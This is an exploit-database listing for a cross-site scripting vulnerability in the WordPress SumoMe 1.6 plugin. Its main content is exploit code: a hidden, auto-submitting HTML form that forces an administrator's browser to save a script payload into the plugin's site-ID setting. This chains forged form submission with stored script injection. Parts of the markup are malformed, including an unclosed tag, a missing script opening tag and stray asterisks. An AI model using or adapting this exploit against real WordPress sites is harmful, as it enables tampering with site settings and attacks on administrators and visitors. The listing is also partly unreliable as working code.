Wordpress sumome 1.6 Cross Site Scripting Vulnerability

2015-01-05T00:00:00
ID 1337DAY-ID-23069
Type zdt
Reporter Ashiyane
Modified 2015-01-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : Wordpress sumome 1.6 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : https://wordpress.org/plugins/sumome/

# Software Link :https://downloads.wordpress.org/plugin/sumome.zip

# Date : 2015-01-03

# Tested on : Windows 7 / Mozilla Firefox
######################

# Location : http://127.0.0.1/wordpress/wp-admin/options-general.php?page=sumome

######################

Exploit Code:

<html>
<body>
<style>
#test{
display:none;
}
</style>

<div id="test">
<form method="post" action="http://localhost/wordpress/wp-admin/options.php">
<input type='hidden' name='option_page' value='sumome' /><input type="hidden"
name="action" value="update" /><input type="hidden" id="_wpnonce"
name="_wpnonce" value="934a83b2a9" /><input type="hidden"
name="_wp_http_referer"
value="/wordpress/wp-admin/options-general.php?page=sumome&settings-updated=true" /> <div
class="sumome-instructions">


<input type="text" name="sumome_site_id" id="sumome_site_id"
value='"><script>alert(1)</script>' style="width: 540px"
<p class="submit"><input type="submit" name="submit" id="submit"
class="button button-primary" value="Save Changes" /></p> </form>

</div>
**********
function clickin(){
document.getElementById('submit').click()
}setTimeout("clickin()",0000);
</script>
</body>
</html>

#  0day.today [2018-01-04]  #